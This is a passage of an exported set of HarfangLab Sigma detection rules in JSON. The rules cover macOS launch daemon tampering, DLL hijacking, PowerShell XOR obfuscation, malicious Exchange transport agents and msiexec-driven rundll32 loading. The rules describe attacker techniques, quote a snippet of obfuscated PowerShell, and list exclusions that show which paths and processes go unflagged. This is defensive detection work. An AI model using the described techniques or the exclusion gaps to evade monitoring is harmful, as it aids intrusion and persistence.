+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.093612Z",
+ "creation_date": "2026-03-23T11:45:34.093614Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.093619Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1543/004/"
+ ],
+ "name": "t1543_004_launch_daemons_modified.yml",
+ "content": "title: Launch Daemon Modified\nid: 0247bb14-5962-4133-9181-cb2f419787f1\ndescription: |\n Detects a modification of a launch daemon.\n Adversaries may modify existing launch daemons in order to install a backdoor.\n It is recommended to check if the process making the modification has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.004\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_process:\n ProcessImage|contains: '?'\n\n selection_kind_write:\n Kind: 'write'\n Path|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n selection_kind_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n filter_nosync:\n Path|contains: '.dat.nosync'\n\n filter_ds_store:\n Path|endswith: '/.DS_Store'\n\n exclusion_vim:\n Image: '/usr/bin/vim'\n\n exclusion_jamf:\n - Image: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentImage: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n - ProcessCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n - ProcessParentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n\n # used by a lot of installer\n exclusion_cp:\n Image: '/bin/cp'\n\n exclusion_bomgar:\n ProcessCommandLine|startswith:\n - '/bin/bash /Library/LaunchDaemons/.com.bomgar.bomgar-ps-*/mac_service_helper.sh'\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n\n exclusion_desktop_services_priv:\n ProcessCommandLine:\n - '/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper'\n - '/system/library/privateframeworks/desktopservicespriv.framework/versions/a/resources/desktopserviceshelper'\n\n exclusion_finder:\n Image: '/system/library/coreservices/finder.app/contents/macos/finder'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_eset:\n ProcessGrandparentImage: '/Applications/ESET Endpoint Security.app/Contents/MacOS/execd'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n condition: selection_version and selection_process and 1 of selection_kind_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0247bb14-5962-4133-9181-cb2f419787f1",
+ "rule_name": "Launch Daemon Modified",
+ "rule_description": "Detects a modification of a launch daemon.\nAdversaries may modify existing launch daemons in order to install a backdoor.\nIt is recommended to check if the process making the modification has legitimate reasons to do so.\n",
+ "rule_creation_date": "2024-06-18",
+ "rule_modified_date": "2025-10-29",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1543.004",
+ "attack.t1647"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "027c5f6b-cba7-426c-af04-233b87967507",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.593375Z",
+ "creation_date": "2026-03-23T11:45:34.593378Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.593386Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_vssadmin.yml",
+ "content": "title: DLL Hijacking via vssadmin.exe\nid: 027c5f6b-cba7-426c-af04-233b87967507\ndescription: |\n Detects potential Windows DLL Hijacking via vssadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vssadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "027c5f6b-cba7-426c-af04-233b87967507",
+ "rule_name": "DLL Hijacking via vssadmin.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via vssadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "029996a2-753c-4bd1-ac20-b8f180acbf90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "weak",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-24T07:14:08.491571Z",
+ "creation_date": "2026-03-23T11:45:34.624842Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.624846Z",
+ "rule_level": "medium",
+ "rule_confidence": "weak",
+ "rule_confidence_override": null,
+ "references": [
+ "https://redcanary.com/blog/yellow-cockatoo/",
+ "https://redcanary.com/threat-detection-report/techniques/powershell/",
+ "https://attack.mitre.org/techniques/T1059/001/",
+ "https://attack.mitre.org/techniques/T1027/"
+ ],
+ "name": "t1059_001_powershell_xor_obfuscation_script.yml",
+ "content": "title: PowerShell XOR Obfuscation\nid: 029996a2-753c-4bd1-ac20-b8f180acbf90\ndescription: |\n Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\n This is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\n It is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\n If the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/06/24\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1027\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # seen in PowerShell commandlines : ;$_-bXoR$S[($S[$I]+$S[$H])%256]}};\n selection:\n PowershellCommand|contains: '-bxor'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_remote_exchange:\n PowershellCommand|contains|all:\n - 'function ExportPSSessionAndImportModule'\n - 'hashValue -bxor ?CurrentUserRemotePSSettings.Hash'\n # function ExportPSSessionAndImportModule ($remotePSSettinsPath, $modulePath, [switch]$AllowClobber)\n # {\n # $hashValue = $global:remoteSession.ApplicationPrivateData.ImplicitRemoting.Hash\n # $CurrentUserRemotePSSettings = Get-ItemProperty -path $remotePSSettinsPath -ErrorAction SilentlyContinue\n # # PS3.0, Get-ItemProperty will return DWORD data as UInt32, instead of Int32 in PS2.0.\n # # If $hashValue is negative, (CurrentUserRemotePSSettings.Hash -ne $hashValue) will always be $true\n # # We use bitwise xor operation to work around\n # if (($CurrentUserRemotePSSettings -eq $null) `\n # -or ($CurrentUserRemotePSSettings.Hash -eq $null) `\n # -or (-not ($CurrentUserRemotePSSettings.ModulePath)) `\n # -or (($hashValue -bxor $CurrentUserRemotePSSettings.Hash) -ne 0))\n # {\n # # Redo Everything, when:\n # # 1. No registry entry found, or\n # # 2. Registry entry exists, but hash value or ModulePath is empty (which is very unlikely) or\n exclusion_sentinel_one:\n # C:\\Program Files\\SentinelOne\\Sentinel Agent 21.6.2.272\\SentinelPie.bin\n PowershellScriptPath: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelPie.bin'\n\n exclusion_defender:\n # C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1\n - PowershellCommand|contains:\n - 'xor between (2^32 - 1) and (2^(32-cidr) - 1) giving a binary with (32-cidr) leading bits ON'\n - '[ipaddress]([math]::pow(2, 32) -1 -bxor'\n - 'pow(2, 32) -1 -bxor [math]::pow(2, (32 - $cidr))-1)'\n - ProcessParentImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseCM.exe'\n\n exclusion_desktop_ini_hidden:\n # https://github.com/Vincoll/PS_NetworkShortcutTreeview\n # https://github.com/pauby/oxygen\n PowershellCommand|contains|all:\n - 'Desktop.ini'\n - '-Name Attributes -Value ([IO.FileAttributes]::System -bxor [IO.FileAttributes]::Hidden'\n\n # https://www.powershellgallery.com/packages/dbatools/1.1.103/Content/functions%5CInvoke-DbaDbDecryptObject.ps1\n exclusion_dbatool1:\n PowershellCommand|contains|all:\n - 'function Invoke-DecryptData() {'\n - '# Loop through each of the characters and apply an XOR to decrypt the data'\n - '# Compare the byte string character to the key character using XOR'\n - '# Create array list to hold the results'\n exclusion_dbatool2:\n PowershellCommand|contains|all:\n - 'function Get-DbaProductKey {'\n - '.SYNOPSIS'\n exclusion_dbatool3:\n PowershellCommand|contains|all:\n - 'function Find-DbaInstance {'\n - '.SYNOPSIS'\n\n exclusion_ixbs_apps:\n ProcessGrandparentImage:\n - '?:\\SRCI\\iXBs_Applications\\iXBus Serveur\\Plugins\\\\*\\service.exe'\n - '?:\\SRCI\\iXBs_Applications\\iXBus Server\\Plugins\\\\*\\service.exe'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\program files\\powershell\\7\\Modules\\'\n - '?:\\Program Files (x86)\\Spiceworks Agent Shell\\modules\\Inventory Module\\'\n\n exclusion_cyberwatch:\n - ProcessImage|endswith: 'CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CYBERWATCH SAS'\n - ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_ansible:\n - ProcessGrandparentCommandLine|contains:\n - 'powershell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains:\n - '?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\OpenSSH\\sshd.exe|?:\\Windows\\System32\\services.exe'\n - ProcessCommandLine|contains: 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains: '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - PowershellCommand|contains: '$module = [Ansible.Basic.AnsibleModule]::Create($args, $spec)'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_log4net:\n - PowershellScriptPath|endswith: '\\Log4Net-Module\\Log4Net-Module.psm1'\n - PowershellCommand|contains|all:\n - '# Example of File Appender initialization'\n - '$Log = [log4net.LogManager]::GetLogger(\"root\");'\n - '# $Log.$Level($Message); # Ne fonctionnait pas sous 2012 non R2 PS3.0'\n - '[log4net.LogManager]::ResetConfiguration();'\n\n exclusion_ninjarmm:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\*.ps1'\n\n # https://github.com/DanysysTeam/PS-SFTA/blob/master/SFTA.ps1\n exclusion_sfta:\n PowershellCommand|contains|all:\n - 'https://github.com/DanysysTeam/PS-SFTA'\n - 'function Get-FTA {'\n - 'Write-Output (( $iValue -shr $iCount) -bxor 0xFFFF0000)'\n\n exclusion_sysvol:\n PowershellScriptPath|contains: '\\sysvol\\\\*\\Policies\\{????????-????-????-????-????????????}\\User\\Scripts\\'\n\n exclusion_avacee:\n ProcessParentImage: '?:\\Program Files\\Avacee\\sip_agent\\SIPAgent.exe'\n\n exclusion_wybot:\n ProcessParentImage: '?:\\Program Files\\osquery\\\\*.exe'\n Signed: 'true'\n Signature: 'WYBOT SAS'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "029996a2-753c-4bd1-ac20-b8f180acbf90",
+ "rule_name": "PowerShell XOR Obfuscation",
+ "rule_description": "Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\nThis is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\nIt is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\nIf the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\n",
+ "rule_creation_date": "2021-06-24",
+ "rule_modified_date": "2026-03-20",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1027",
+ "attack.t1059.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "029b4b5e-5b84-4646-ae2b-9c19d795c627",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.617032Z",
+ "creation_date": "2026-03-23T11:45:34.617036Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.617043Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
+ "https://attack.mitre.org/techniques/T1505/002/"
+ ],
+ "name": "t1505_002_edgetransport_loading_unsigned_dll.yml",
+ "content": "title: Exchange EdgeTransport.exe Loaded Unsigned DLL\nid: 029b4b5e-5b84-4646-ae2b-9c19d795c627\ndescription: |\n Detects the loading of an unsigned DLL into EdgeTransport.exe.\n Attackers can install malicious TransportAgents in an compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/22\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1071.003\n - attack.t1104\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EdgeTransport.exe'\n ImageLoaded|contains: '?'\n\n filter_empty:\n ImageSize: 0\n\n filter_microsoft_pdb:\n ManagedPdbBuildPath|startswith:\n - '?:\\dbs\\sh\\e16dt\\'\n - '?:\\dbs\\sh\\gffn\\'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_assembly:\n ImageLoaded|startswith: '?:\\Windows\\assembly\\'\n\n exclusion_msvcm:\n ImageLoaded: '?:\\Windows\\winsxs\\amd64_microsoft.vc*.crt_*\\msvcm*.dll'\n\n exclusion_trendmicro:\n ImageLoaded|startswith: '?:\\Program Files\\Trend Micro\\Smex\\'\n\n exclusion_newton_json:\n ManagedPdbBuildPath: '?:\\Development\\Releases\\Json\\Working\\Newtonsoft.Json\\Src\\Newtonsoft.Json\\obj\\Release\\Newtonsoft.Json.pdb'\n\n exclusion_skimsigner:\n ImageLoaded|startswith: '?:\\Program Files\\Exchange DkimSigner'\n\n exclusion_exclaimer:\n ImageLoaded|startswith: '?:\\Program Files\\Exclaimer Ltd\\Email Alias Manager\\'\n\n exclusion_xml_serializer:\n sha256: 'd934a6ed579619a0c0629606a0b774855703a5eec5661749e823d4456ed77e33'\n ImageLoaded|startswith: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\XmlSerializer.Exclaimer.LeanLicensing.License_'\n\n exclusion_passive_monitoring:\n sha256: '5eb73220279d1fa2525912a6e34061646990382b82dbd250297dbf6bbb8a9aaf'\n\n exclusion_mimekit:\n - ImageLoaded: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\MimeKit.dll'\n - sha256: '69ae032bad923d3e9b7ad95b569222cdbe6ddcfb56cb302e7419869000b07dcd'\n\n exclusion_codetwo:\n ImageLoaded: '?:\\Program Files\\CodeTwo\\CodeTwo Exchange Rules\\\\*.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "029b4b5e-5b84-4646-ae2b-9c19d795c627",
+ "rule_name": "Exchange EdgeTransport.exe Loaded Unsigned DLL",
+ "rule_description": "Detects the loading of an unsigned DLL into EdgeTransport.exe.\nAttackers can install malicious TransportAgents in an compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\n",
+ "rule_creation_date": "2022-11-22",
+ "rule_modified_date": "2025-11-05",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.collection",
+ "attack.command_and_control",
+ "attack.defense_evasion",
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1071.003",
+ "attack.t1104",
+ "attack.t1114.002",
+ "attack.t1505.002",
+ "attack.t1546.008"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "029c4324-60c2-46df-b249-b6b72b737c5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.616491Z",
+ "creation_date": "2026-03-23T11:45:34.616495Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.616503Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://twitter.com/Cryptolaemus1/status/1733243361534857222",
+ "https://attack.mitre.org/techniques/T1218/011/"
+ ],
+ "name": "t1218_011_suspicious_rundll32_msiexec.yml",
+ "content": "title: Suspicious RunDLL32 Execution via MSIExec\nid: 029c4324-60c2-46df-b249-b6b72b737c5e\ndescription: |\n Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\n Attackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\n Specifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\n This behavior is used by the Pikabot malware, in its initial infection chain.\n It is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1733243361534857222\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2023/12/11\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'RUNDLL32.EXE'\n CommandLine|contains: '?:\\Users\\\\*\\AppData\\Local\\Temp'\n ParentImage|endswith: '\\rundll32.exe'\n GrandparentImage|endswith: '\\msiexec.exe'\n\n exclusion_setupapi:\n CommandLine|contains: 'setupapi,InstallHinfSection'\n\n exclusion_adinstrument:\n CommandLine|contains: '\\ADInstruments\\LabChart8\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "029c4324-60c2-46df-b249-b6b72b737c5e",
+ "rule_name": "Suspicious RunDLL32 Execution via MSIExec",
+ "rule_description": "Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\nAttackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\nSpecifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\nThis behavior is used by the Pikabot malware, in its initial infection chain.\nIt is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\n",
+ "rule_creation_date": "2023-12-11",
+ "rule_modified_date": "2025-02-07",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1218.011"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
